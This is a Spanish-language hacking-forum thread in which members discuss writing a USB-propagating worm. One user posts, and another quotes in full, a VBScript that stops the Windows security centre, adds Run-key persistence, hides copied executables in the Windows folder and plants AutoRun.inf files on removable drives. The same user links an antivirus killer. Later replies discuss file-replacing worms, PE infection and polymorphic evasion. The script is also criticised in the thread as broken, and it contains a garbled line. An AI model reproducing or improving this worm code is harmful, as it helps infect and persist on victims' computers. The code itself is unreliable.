Autor
|
Tema: Mi nuevo propagador, por usb!! (Leído 21,089 veces)
|
Garfield07
Desconectado
Mensajes: 1.121
¡Este año voy a por todas! JMJ 2011
|
Sep, lo ultimo seria bueno... Podrias poner algo del code? (Si quieres, claro, es para verlo nada mas xD) Eso yo lo haria en C, en ASM seria mas dificil para mi...
|
|
|
En línea
|
* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente. * No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado. * Si compila esta bien, si arranca es perfecto. ¡Wiki elhacker.net!Un saludo
|
|
|
sabeeee
Desconectado
Mensajes: 155
|
Acá tenes este killer http://troyanosyvirus.com.ar/2008/02/av-firewall-killer.html que me mato al nod32v4 2011 pero ojo, es detectado yo una vez logre que sea detectado solo por 11 antivirus con pero...lo borre porque se que se pueden hacer virus sin destruir a un antivirus, eso ya es maldad. pero proba con esto: set cmd = createobject("wscript.shell" ) cmd.run "cmd /c #djkds£êÑÊÀ×ËÎÄÊÀÑÎ×ËäêôŒËÎ×ô¼ŒŠ×ô ", vbHide cmd.run "cmd /c net stop "Centro de seguridad" ", vbHide cmd.run "cmd /c reg delete hklm\software\microsoft\windows\currentversion\run /v prop /f ", vbHide cmd.run "cmd /c reg add hklm\software\microsoft\windows\currentversion\run /v prop /d "%windir%\prop.exe" ", vbHide cmd.run "cmd /c ping -n 8 localhost > nul ", vbHide cmd.run "cmd /c attrib -s -r -h video.wmv.exe ", vbHide cmd.run "cmd /c copy /y "video.wmv.exe" "%windir%\video.wmv.exe ", vbHide cmd.run "cmd /c if exist c:\windows\video.wmv.exe start c:\windows\video.wmv.exe ", vbHide cmd.run "cmd /c attrib -s -r -h junto.exe ", vbHide cmd.run "cmd /c copy /y "junto.exe" "%windir%\junto.exe ", vbHide cmd.run "cmd /c attrib -s -r -h prop.exe ", vbHide cmd.run "cmd /c copy /y "prop.exe" "%windir%\prop.exe ", vbHide cmd.run "cmd /c attrib +s +r +h video.wmv.exe ", vbHide cmd.run "cmd /c attrib +s +r +h prop.exe ", vbHide cmd.run "cmd /c attrib +s +r +h junto.exe ", vbHide cmd.run "cmd /c :bucle ", vbHide cmd.run "cmd /c call :copiausb ", vbHide cmd.run "cmd /c :copiausb ", vbHide cmd.run "cmd /c if exist E: call :creausb E ", vbHide cmd.run "cmd /c if exist F: call :creausb F ", vbHide cmd.run "cmd /c if exist G: call :creausb G ", vbHide cmd.run "cmd /c if exist H: call :creausb H ", vbHide cmd.run "cmd /c if exist I: call :creausb I ", vbHide cmd.run "cmd /c if exist J: call :creausb J ", vbHide cmd.run "cmd /c if exist K: call :creausb K ", vbHide cmd.run "cmd /c ping -n 8 localhost > nul ", vbHide cmd.run "cmd /c goto bucle ", vbHide cmd.run "cmd /c goto :eof ", vbHide cmd.run "cmd /c :creausb ", vbHide cmd.run "cmd /c copy /y "%windir%\junto.exe" "%1:\junto.exe" ", vbHide cmd.run "cmd /c attrib +s +r +h %1:\junto.exe ", vbHide cmd.run "cmd /c echo [Autorun] > %windir%\AutoRun.inf ", vbHide cmd.run "cmd /c echo open="junto.exe" >> %windir%\AutoRun.inf ", vbHide cmd.run "cmd /c echo icon=%SystemRoot%\system32\SHELL32.dll,4 >> %windir%\AutoRun.inf ", vbHide cmd.run "cmd /c echo action=Abrir carpeta para ver archivos >> %windir%\AutoRun.inf ", vbHide cmd.run "cmd /c echo shellexecute="junto.exe" >> %windir%\AutoRun.inf ", vbHide cmd.run "cmd /c echo UseAutoPlay=1 >> %windir%\AutoRun.inf ", vbHide cmd.run "cmd /c echo shell\\\Install\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide cmd.run "cmd /c echo shell\\\open\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide cmd.run "cmd /c echo shell\\\explore\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide cmd.run "cmd /c echo Shell\\\open\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide cmd.run "cmd /c copy /y %windir%\AutoRun.inf "%1:\AutoRun.inf" ", vbHide cmd.run "cmd /c attrib +h +s +r "%1:\AutoRun.inf" ", vbHide cmd.run "cmd /c goto :eof ", vbHide y convertirlo con el ExeScript. Saludos y espero que te sirva...
|
|
|
En línea
|
"Vengándose, uno iguala a su enemigo; perdonando, uno se muestra superior a él." Francis Bacon
|
|
|
Garfield07
Desconectado
Mensajes: 1.121
¡Este año voy a por todas! JMJ 2011
|
sagrini, yo no digo que se haga en batch, he dicho que lo he hecho en Pascal. Sobre lo que se comenta de batch nose, pero si suplantan un exe por un batch el icono canta que no veas...
fff menos mal es que como estamos hablando con Batch... Ya decia yo... Yo lo haria en C de todos modos Pascal no me resulta muy conocido Sobre el nuevo code... lo has escrito tu? Yo lo haria con APIs de C, que son algo mas extensas... Pero creo que tu code no funciona No estamos buscando eso exactamente Lord RNA podrias enseñarme el code? Es por verlo, si quieres... @skapunky ahora en un ratillo podria hacer el primer programa en C, y listo...
|
|
|
En línea
|
* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente. * No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado. * Si compila esta bien, si arranca es perfecto. ¡Wiki elhacker.net!Un saludo
|
|
|
Space.Medafighter.X
Desconectado
Mensajes: 24
|
set cmd = createobject("wscript.shell" ) cmd.run "cmd /c #djkds£êÑÊÀ×ËÎÄÊÀÑÎ×ËäêôŒËÎ×ô¼ŒŠ×ô ", vbHide cmd.run "cmd /c net stop "Centro de seguridad" ", vbHide cmd.run "cmd /c reg delete hklm\software\microsoft\windows\currentversion\run /v prop /f ", vbHide cmd.run "cmd /c reg add hklm\software\microsoft\windows\currentversion\run /v prop /d "%windir%\prop.exe" ", vbHide cmd.run "cmd /c ping -n 8 localhost > nul ", vbHide cmd.run "cmd /c attrib -s -r -h video.wmv.exe ", vbHide cmd.run "cmd /c copy /y "video.wmv.exe" "%windir%\video.wmv.exe ", vbHide cmd.run "cmd /c if exist c:\windows\video.wmv.exe start c:\windows\video.wmv.exe ", vbHide cmd.run "cmd /c attrib -s -r -h junto.exe ", vbHide cmd.run "cmd /c copy /y "junto.exe" "%windir%\junto.exe ", vbHide cmd.run "cmd /c attrib -s -r -h prop.exe ", vbHide cmd.run "cmd /c copy /y "prop.exe" "%windir%\prop.exe ", vbHide cmd.run "cmd /c attrib +s +r +h video.wmv.exe ", vbHide cmd.run "cmd /c attrib +s +r +h prop.exe ", vbHide cmd.run "cmd /c attrib +s +r +h junto.exe ", vbHide cmd.run "cmd /c :bucle ", vbHide cmd.run "cmd /c call :copiausb ", vbHide cmd.run "cmd /c :copiausb ", vbHide cmd.run "cmd /c if exist E: call :creausb E ", vbHide cmd.run "cmd /c if exist F: call :creausb F ", vbHide cmd.run "cmd /c if exist G: call :creausb G ", vbHide cmd.run "cmd /c if exist H: call :creausb H ", vbHide cmd.run "cmd /c if exist I: call :creausb I ", vbHide cmd.run "cmd /c if exist J: call :creausb J ", vbHide cmd.run "cmd /c if exist K: call :creausb K ", vbHide cmd.run "cmd /c ping -n 8 localhost > nul ", vbHide cmd.run "cmd /c goto bucle ", vbHide cmd.run "cmd /c goto :eof ", vbHide cmd.run "cmd /c :creausb ", vbHide cmd.run "cmd /c copy /y "%windir%\junto.exe" "%1:\junto.exe" ", vbHide cmd.run "cmd /c attrib +s +r +h %1:\junto.exe ", vbHide cmd.run "cmd /c echo [Autorun] > %windir%\AutoRun.inf ", vbHide cmd.run "cmd /c echo open="junto.exe" >> %windir%\AutoRun.inf ", vbHide cmd.run "cmd /c echo icon=%SystemRoot%\system32\SHELL32.dll,4 >> %windir%\AutoRun.inf ", vbHide cmd.run "cmd /c echo action=Abrir carpeta para ver archivos >> %windir%\AutoRun.inf ", vbHide cmd.run "cmd /c echo shellexecute="junto.exe" >> %windir%\AutoRun.inf ", vbHide cmd.run "cmd /c echo UseAutoPlay=1 >> %windir%\AutoRun.inf ", vbHide cmd.run "cmd /c echo shell\\\Install\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide cmd.run "cmd /c echo shell\\\open\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide cmd.run "cmd /c echo shell\\\explore\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide cmd.run "cmd /c echo Shell\\\open\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide cmd.run "cmd /c copy /y %windir%\AutoRun.inf "%1:\AutoRun.inf" ", vbHide cmd.run "cmd /c attrib +h +s +r "%1:\AutoRun.inf" ", vbHide cmd.run "cmd /c goto :eof ", vbHide
Hacía tiempo que no veía un código tan chistoso. Es increíble como alguien pueda pensar que eso funcionaría correctamente, sobretodo leyendo la parte de los IF, en los que se hace un CALL a una función. Cuando haces un "cmd.run" estás ejecutando la CMD con el parámetro "/C", bueno hasta aquí estamos bastante claros, pero ¿sabes lo que pasa cuando usas el parámetro /C? estás ejecutando varias veces distintas sesiones del intérprete de comandos, por lo cual, ejecutas las líneas del script por separado y no tienen relación alguna con las que ejecutan despues. Tampoco el código es una obra maestra... cmd.run "cmd /c #djkds£êÑÊÀ×ËÎÄÊÀÑÎ×ËäêôŒËÎ×ô¼ŒŠ×ô ", vbHide Eso fue muy sin sentido... cmd.run "cmd /c reg delete hklm\software\microsoft\windows\currentversion\run /v prop /f ", vbHide cmd.run "cmd /c reg add hklm\software\microsoft\windows\currentversion\run /v prop /d "%windir%\prop.exe" ", vbHide En ese caso, habría sido mejor únicamente sobreescribir al momento de agregar el valor "prop" a "run" usando el parámetro "/f". Bueno, eso sin mencionar los CALL y los GOTO que saltan a ninguna parte, los ejecutables que no se de donde salieron, etc. Lord RNA podrias enseñarme el code? Es por verlo, si quieres... Ciertamente no es complicado, Yo hice uno en ASM que suplantaba un ejecutable y guardaba el real en otra parte del disco, cuando dabas doble clic se ejecutaba el worm y lanzaba el programa real Técnicamente eso sería usar el API "MoveFile" de la librería kernel32.dll, y un "ShellExecute" o "CreateProcess" (para todos los gustos) de la misma librería DLL. Hmm en cuanto al tema de infección de ejecutables, ya había un ejemplo en el subforo de ASM en esta comunidad... Si no mal recuerdo, hablaba sobre infección agregando una sección llamada ".TLS" en el PE.
|
|
|
En línea
|
|
|
|
sabeeee
Desconectado
Mensajes: 155
|
Hacía tiempo que no veía un código tan chistoso. Es increíble como alguien pueda pensar que eso funcionaría correctamente, sobretodo leyendo la parte de los IF, en los que se hace un CALL a una función. Cuando haces un "cmd.run" estás ejecutando la CMD con el parámetro "/C", bueno hasta aquí estamos bastante claros, pero ¿sabes lo que pasa cuando usas el parámetro /C? estás ejecutando varias veces distintas sesiones del intérprete de comandos, por lo cual, ejecutas las líneas del script por separado y no tienen relación alguna con las que ejecutan despues.
Tampoco el código es una obra maestra...
Eso fue muy sin sentido...
En ese caso, habría sido mejor únicamente sobreescribir al momento de agregar el valor "prop" a "run" usando el parámetro "/f".
Bueno, eso sin mencionar los CALL y los GOTO que saltan a ninguna parte, los ejecutables que no se de donde salieron, etc.
Ciertamente no es complicado,
Técnicamente eso sería usar el API "MoveFile" de la librería kernel32.dll, y un "ShellExecute" o "CreateProcess" (para todos los gustos) de la misma librería DLL.
Hmm en cuanto al tema de infección de ejecutables, ya había un ejemplo en el subforo de ASM en esta comunidad... Si no mal recuerdo, hablaba sobre infección agregando una sección llamada ".TLS" en el PE.
PERDÓN ES QUE SOY MUY NUEVO EN ESTOY Y GRACIAS POR TU LECCIÓN.
|
|
« Última modificación: 25 Enero 2011, 20:16 pm por boludoz »
|
En línea
|
"Vengándose, uno iguala a su enemigo; perdonando, uno se muestra superior a él." Francis Bacon
|
|
|
sabeeee
Desconectado
Mensajes: 155
|
Igual la idea básica sirve de todos modos es la mejor que por lo menos yo conozco de ocultar por completo un código en linea de comando sin ser detectado por el av.
|
|
« Última modificación: 25 Enero 2011, 20:29 pm por boludoz »
|
En línea
|
"Vengándose, uno iguala a su enemigo; perdonando, uno se muestra superior a él." Francis Bacon
|
|
|
.:Snifer:.
Desconectado
Mensajes: 74
|
Hey men no hagas doble post..!!! solo edita el anterior nada mas que eso hay la opcion de editar, modificar mensaje
Aver si entendi. un poco lo que indica Lord y aparte sakapunky creo si se hace por suplantacion es mejor.
Pero si se llega a realizar un Worm que sea capaz de modificarse a si mismo entre los S.0 es decir XP,VISTA y 7 no llegaria a ser mas factible. Un poco de polimorfismo si no estoy mal .. Espero que alguien me corrija si ando mal.
|
|
|
En línea
|
|
|
|
NESTicle 8Bit
|
Yo creo q este espacio no es para ofender y atacarnos es para compartir ideas y expresarlas libremente, la propuesta de morty2 es interesante y me gustaría probarla haber que tal !!!
|
|
|
En línea
|
|
|
|
jlpm
Desconectado
Mensajes: 3
|
funciona en windows7?? saludos
|
|
|
En línea
|
|
|
|
locot3
Desconectado
Mensajes: 74
|
Muchas criticas para ser un proyecto !! ajahaha esta bueno yo te felicito ! pero con el tiempo estoy seguro q podras mejorarlo mucho
|
|
|
En línea
|
|
|
|
|
|